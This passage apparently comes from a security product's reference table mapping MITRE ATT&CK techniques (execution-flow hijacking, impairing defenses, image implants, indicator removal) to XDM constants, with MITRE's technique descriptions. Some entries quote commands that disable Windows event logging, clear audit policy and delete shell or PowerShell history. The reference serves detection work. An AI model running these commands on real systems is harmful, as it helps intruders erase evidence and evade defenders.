defenses, such as application control or other restrictions on execution. There are many ways an adversary
may hijack the flow of execution, including by manipulating how the operating system locates programs to
be executed. How the operating system locates libraries to be used by a program can also be intercepted.
Locations where the operating system looks for programs/resources, such as file directories and in the case
of Windows the Registry, could also be poisoned to include malicious payloads. https://attack.mitre.org/
techniques/T1574

T1574.012 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_COR_PROFILER Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of
programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows
developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET
process that loads the Common Language Runtime (CLR). These profilers are designed to monitor,
troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)
(Citation: Microsoft COR_PROFILER Feb 2013) The COR_PROFILER environment variable can be set at
various scopes (system, user, or process) resulting in different levels of influence. System and user-wide
environment variable scopes are specified in the Registry, where a [Component Object Model](https://
attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope
COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET
Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is
specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb
2013) Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in
the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to
elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the
victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://
attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May
2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)
(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) https://attack.mitre.org/
techniques/T1574/012

T1574.001 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_DLL_SEARCH_ORDER_HIJACKING Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs.
Windows systems use a common method to look for required DLLs to load into a program. (Citation:
Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads
may be for the purpose of establishing persistence as well as elevating privileges and/or evading
restrictions on file execution. There are many ways an adversary can hijack DLL loads. Adversaries may
plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a
legitimate library that will be requested by a program, causing Windows to load their malicious library when
it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary
planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an
ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this
location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL
preloading attacks occur when a program sets its current directory to a remote location such as a Web
share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) Adversaries may also directly
modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a
redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library
Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) If a search order-
vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is
loaded will also be executed at the higher level. In this case, the technique could be used for privilege
escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the
program. Programs that fall victim to path hijacking may appear to behave normally because malicious
DLLs may be configured to also load the legitimate DLLs they were meant to replace. https://
attack.mitre.org/techniques/T1574/001

T1574.002 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_DLL_SIDE_LOADING Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order
Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a
program loads. But rather than just planting the DLL within the search order of a program then waiting for
the victim application to be invoked, adversaries may directly side-load their payloads by planting then
invoking a legitimate application that executes their payload(s). Side-loading takes advantage of the DLL
search order used by the loader by positioning both the victim application and malicious payload(s)
alongside each other. Adversaries likely use side-loading as a means of masking actions they perform
under a legitimate, trusted, and potentially elevated system or software process. Benign executables used
to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also
be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation:
FireEye DLL Side-Loading) https://attack.mitre.org/techniques/T1574/002
Original Mapped Description

T1574.004 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_DYLIB_HIJACKING Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an
expected name in a path a victim application searches at runtime. The dynamic loader will try to find the
dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath,
which allows developers to use relative paths to specify an array of search paths used at runtime based on
the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables
developers to run an application on multiple macOS versions as new APIs are added. Adversaries may
gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.
(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github
EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into
an application's address space allowing the malicious dylib to inherit the application's privilege level and
resources. Based on the application, this could result in privilege escalation and uninhibited network
access. This method may also evade detection from security products since the execution is masked under
a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)
(Citation: MalwareUnicorn macOS Dylib Injection MachO) https://attack.mitre.org/techniques/T1574/004

T1574.006 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_DYNAMIC_LINKER_HIJACKING Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic
linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic
linker loads specified absolute paths of shared libraries from environment variables and files, such as
LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables
are loaded first, taking precedence over system libraries with the same function name.(Citation: Man
LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables
are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols,
and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory,
system/network resources, and possibly elevated privileges. This method may also evade detection from
security products since the execution is masked under a legitimate process. Adversaries can set
environment variables via the command line using the export command, setenv function, or putenv
function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/
T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such
Python’s os.environ. On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match
the name of legitimate libraries which are requested by a victim program, causing the operating system to
load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the
environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap()
respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack
halfdead 1997)(Citation: Brown Exploiting Linkers) On macOS this behavior is conceptually the same as on
Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries
can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names
of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit
DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo
DYLD_INSERT_LIBRARIES Catalina Bypass) https://attack.mitre.org/techniques/T1574/006

T1574.005 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_EXECUTABLE_INSTALLER_FILE_PERMISSIONS_WEAKNESS Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These
processes may automatically execute specific binaries as part of their functionality or to perform other
actions. If the permissions on the file system directory containing a target binary, or permissions on the
binary itself, are improperly set, then the target binary may be overwritten with another binary using user-
level permissions and executed by the original process. If the original process and thread are running under
a higher permissions level, then the replaced binary will also execute under higher-level permissions, which
could include SYSTEM. Another variation of this technique can be performed by taking advantage of a
weakness that is common in executable, self-extracting installers. During the installation process, it is
common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs,
EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate
permissions to restrict write access, which allows for execution of untrusted code placed in the
subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may
take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of
executing code at a higher permissions level. Some installers may also require elevated privileges that will
result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass
User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness
in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)
(Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or
during a certain event (e.g., system bootup) then this technique can also be used for persistence. https://
attack.mitre.org/techniques/T1574/005

T1574.007 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_PATH_INTERCEPTION_BY_PATH_ENVIRONMENT_VARIABLE Adversaries may execute their own malicious payloads by hijacking environment variables used to load
libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH
environment variable, which Windows will then execute when it searches sequentially through that PATH
listing in search of the binary that was called from a script or the command line. The PATH environment
variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or
the command-line) rely solely on the PATH environment variable to determine the locations that are
searched for a program when the path for the program is not given. If any directories are listed in the PATH
environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:
\Windows\system32), a program may be placed in the preceding directory that is named the same as a
Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is
executed from a script or command-line. For example, if C:\example path precedes C:
\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:
\example path will be called instead of the Windows system "net" when "net" is executed from the
command-line. https://attack.mitre.org/techniques/T1574/007

T1574.008 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_PATH_INTERCEPTION_BY_SEARCH_ORDER_HIJACKING Adversaries may execute their own malicious payloads by hijacking the search order used to load other
programs. Because some programs do not call other programs using the full path, adversaries may place
their own file in the directory where the calling program is located, causing the operating system to launch
their malicious software at the request of the calling program. Search order hijacking occurs when an
adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL
Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending
on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows
NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the
directory of the initiating program before searching through the Windows system directory. An adversary
who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to
an executable) may take advantage of this vulnerability by creating a program named after the improperly
specified program and placing it within the initiating program's directory. For example, "example.exe" runs
"cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe"
within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In
addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then
cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable
extensions defined under PATHEXT. (Citation: Microsoft Environment Property) Search order hijacking is
also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://
attack.mitre.org/techniques/T1574/001). https://attack.mitre.org/techniques/T1574/008

T1574.009 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_PATH_INTERCEPTION_BY_UNQUOTED_PATH Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a
higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable
to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:
\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation:
Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in
a higher level directory of the path, and Windows will resolve that executable instead of the intended
executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may
create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows
Unquoted Services) (Citation: Windows Privilege Escalation Guide) This technique can be used for
persistence if executables are called on a regular basis, as well as privilege escalation if intercepted
executables are started by a higher privileged process. https://attack.mitre.org/techniques/T1574/009
Original Mapped Description

T1574.010 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_SERVICES_FILE_PERMISSIONS_WEAKNESS Adversaries may execute their own malicious payloads by hijacking the binaries used by services.
Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed
upon service start. These service processes may automatically execute specific binaries as part of their
functionality or to perform other actions. If the permissions on the file system directory containing a target
binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with
another binary using user-level permissions and executed by the original process. If the original process
and thread are running under a higher permissions level, then the replaced binary will also execute under
higher-level permissions, which could include SYSTEM. Adversaries may use this technique to replace
legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the
executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this
technique can also be used for persistence. https://attack.mitre.org/techniques/T1574/010

T1574.011 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_SERVICES_REGISTRY_PERMISSIONS_WEAKNESS Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the
originally specified executable to one that they control, in order to launch their own code when a service
starts. Windows stores local service configuration information in the Registry under
HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can
be manipulated to modify a service's execution parameters through tools such as the service controller,
sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/
software/S0075). Access to Registry keys is controlled through access control lists and user permissions.
(Citation: Registry Key Security)(Citation: malware_hides_service) If the permissions for users and groups
are not properly set and allow access to the Registry keys for a service, adversaries may change the
service's binPath/ImagePath to point to a different executable under their control. When the service starts
or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish
persistence and/or privilege escalation to the account context the service is set to execute under (local/
domain account, SYSTEM, LocalService, or NetworkService). Adversaries may also alter other Registry
keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the
service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation:
Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) The Performance key
contains the name of a driver service's performance DLL and the names of several exported functions in
the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an
adversary-controlled user has the Create Subkey permission, adversaries may create the Performance
key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms) Adversaries
may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their
malicious services to establish persistence or enable other malicious activities.(Citation:
microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious
services using svchost.exe, the service’s file may be identified using
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll.
(Citation: malware_hides_service) https://attack.mitre.org/techniques/T1574/011

T1562 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES Adversaries may maliciously modify components of a victim environment in order to hinder or disable
defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-
virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior.
This may also span both native defenses as well as supplemental capabilities installed by users and
administrators. Adversaries could also target event aggregation and analysis mechanisms, or otherwise
disrupt these procedures by altering other system components. https://attack.mitre.org/techniques/T1562

T1562.008 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_CLOUD_LOGS An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their
activities and avoid detection. Cloud environments allow for collection and analysis of audit and application
logs that provide insight into what activities a user does within the environment. If an attacker has sufficient
permissions, they can disable logging to avoid detection of their activities. For example, in AWS an
adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.
(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) https://
attack.mitre.org/techniques/T1562/008

T1562.002 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_WINDOWS_EVENT_LOGGING Adversaries may disable Windows event logging to limit data that can be leveraged for detections and
audits. Windows event logs record user and system activity such as login attempts, process creation, and
much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate
detections. The EventLog service maintains event logs from various system components and applications.
(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers
on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the
EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then
navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or
Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.
(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also
be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a
particular application. For example, the EventLog service may be disabled using the following PowerShell
line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries
may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit
policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /
failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable
/failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)
(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines:
auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling
Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
https://attack.mitre.org/techniques/T1562/002

T1562.007 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_OR_MODIFY_CLOUD_FIREWALL Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access
to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or
Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). Cloud environments typically utilize
restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via
expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into
a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress
rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS) Modifying
or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data
exfiltration that would otherwise not be allowed. https://attack.mitre.org/techniques/T1562/007

T1562.004 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_OR_MODIFY_SYSTEM_FIREWALL Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.
Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.
This can be done numerous ways depending on the operating system, including via command-line, editing
Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable
adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be
allowed. https://attack.mitre.org/techniques/T1562/004

T1562.001 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_OR_MODIFY_TOOLS Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and
activities. This may take the many forms, such as killing security software processes or services, modifying
/ deleting Registry keys or configuration files so that tools do not operate properly, or other methods to
interfere with security tools scanning or reporting information. Adversaries may also tamper with artifacts
deployed and utilized by security tools. Security tools may make dynamic changes to system components
in order to maintain visibility into specific events. For example, security products may load their own
modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking]
(https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these
features added by tools (especially those that exist in userland or are otherwise potentially accessible to
adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) https://
attack.mitre.org/techniques/T1562/001
Original Mapped Description

T1562.010 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DOWNGRADE_ATTACK Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or
does not support updated security controls such as logging. For example, [PowerShell](https://
attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record
executed script content. However, adversaries may attempt to execute a previous version of PowerShell
that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562)
while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH
Ransomware 2021)(Citation: Mandiant BYOL 2018) Adversaries may downgrade and use less-secure
versions of various features of a system, such as [Command and Scripting Interpreter](https://
attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-
the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)
https://attack.mitre.org/techniques/T1562/010

T1562.003 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_IMPAIR_COMMAND_HISTORY_LOGGING Adversaries may impair command history logging to hide commands they run on a compromised system.
Various command interpreters keep track of the commands users type in their terminal so that users can
retrace what they've done. On Linux and macOS, command history is tracked in a file pointed to by the
environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the
user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of
what should be saved by the history command and eventually into the ~/.bash_history file when a user
logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be
respected. Adversaries may clear the history environment variable (unset HISTFILE) or set the command
history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL
can be configured to ignore commands that start with a space by simply setting it to "ignorespace".
HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux
systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that
“ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without
leaving traces by simply prepending a space to all of their terminal commands. On Windows systems, the
PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file
($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default).
Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath
{File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible
to turn off logging to this file using the PowerShell command Set-PSReadlineOption -
HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos
PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) https://
attack.mitre.org/techniques/T1562/003

T1562.006 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_INDICATOR_BLOCKING An adversary may attempt to block indicators or events typically captured by sensors from being gathered
and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even
disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event
Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation:
Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files
and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://
attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/
techniques/T1047). ETW interruption can be achieved multiple ways, however most directly by defining
conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider
cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based
reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis.
This may be accomplished by many means, such as stopping a local process responsible for forwarding
telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for
aggregating events, such as security information and event management (SIEM) products. https://
attack.mitre.org/techniques/T1562/006

T1562.009 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_SAFE_MODE_BOOT Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the
Windows operating system with a limited set of drivers and services. Third-party security software such as
endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are
two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional
services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware
2019) Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited
boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data
(BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)
Adversaries may also add their malicious applications to the list of minimal services that start in safe mode
by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)).
Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may
also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation:
CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation:
BleepingComputer REvil 2021) https://attack.mitre.org/techniques/T1562/009

T1525 XDM_CONST.MITRE_TECHNIQUE_IMPLANT_INTERNAL_IMAGE Adversaries may implant cloud or container images with malicious code to establish persistence after
gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google
Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker
can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001),
this technique focuses on adversaries implanting an image in a registry within a victim’s environment.
Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure
provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor
Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.
(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS
instance, and permissions to list the available container images, they may implant a backdoor such as a
[Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor
Technique Sept 2019) https://attack.mitre.org/techniques/T1525

T1070 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such
as quarantined malware. Locations and format of logs are platform or product-specific, however standard
operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://
attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection,
reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of
security solutions by causing notable events to go unreported. This activity may also impede forensic
analysis and incident response, due to lack of sufficient data to determine what occurred. https://
attack.mitre.org/techniques/T1070

T1070.003 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_CLEAR_COMMAND_HISTORY In addition to clearing system logs, an adversary may clear the command history of a compromised account
to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the
commands users type in their terminal so that users can retrace what they've done. On Linux and macOS,
these command histories can be accessed in a few different ways. While logged in, this command history is
tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this
information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is
that it allows users to go back to commands they've used before in different sessions. Adversaries may
delete their commands from these logs by manually clearing the history (history -c) or deleting the bash
history file rm ~/.bash_history. On Windows hosts, PowerShell has two different command history
providers: the built-in history and the command history managed by the PSReadLine module. The built-in
history only tracks the commands used in the current session. This command history is not available to
other sessions and is deleted when the session ends. The PSReadLine command history tracks the
commands used in all PowerShell sessions and writes them to a file
($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default).
This history file is available to all sessions and contains all past history since the file is not deleted when the
session ends.(Citation: Microsoft PowerShell Command History) Adversaries may run the PowerShell
command Clear-History to flush the entire command history from a current PowerShell session. This,
however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the
ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation:
Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) https://
attack.mitre.org/techniques/T1070/003

T1070.002 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_CLEAR_LINUX_OR_MAC_SYSTEM_LOGS Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of
system or user-initiated actions via system logs. The majority of native system logging is stored under the /
var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation:
Linux Logs) * /var/log/messages:: General and system-related messages * /var/log/secure or /var/
log/auth.log: Authentication logs * /var/log/utmp or /var/log/wtmp: Login records * /var/log/
kern.log: Kernel logs * /var/log/cron.log: Crond logs * /var/log/maillog: Mail server logs * /var/
log/httpd/: Web server access and error logs https://attack.mitre.org/techniques/T1070/002
Original Mapped Description

T1070.001 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_CLEAR_WINDOWS_EVENT_LOGS Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a
record of a computer's alerts and notifications. There are three system-defined sources of events: System,
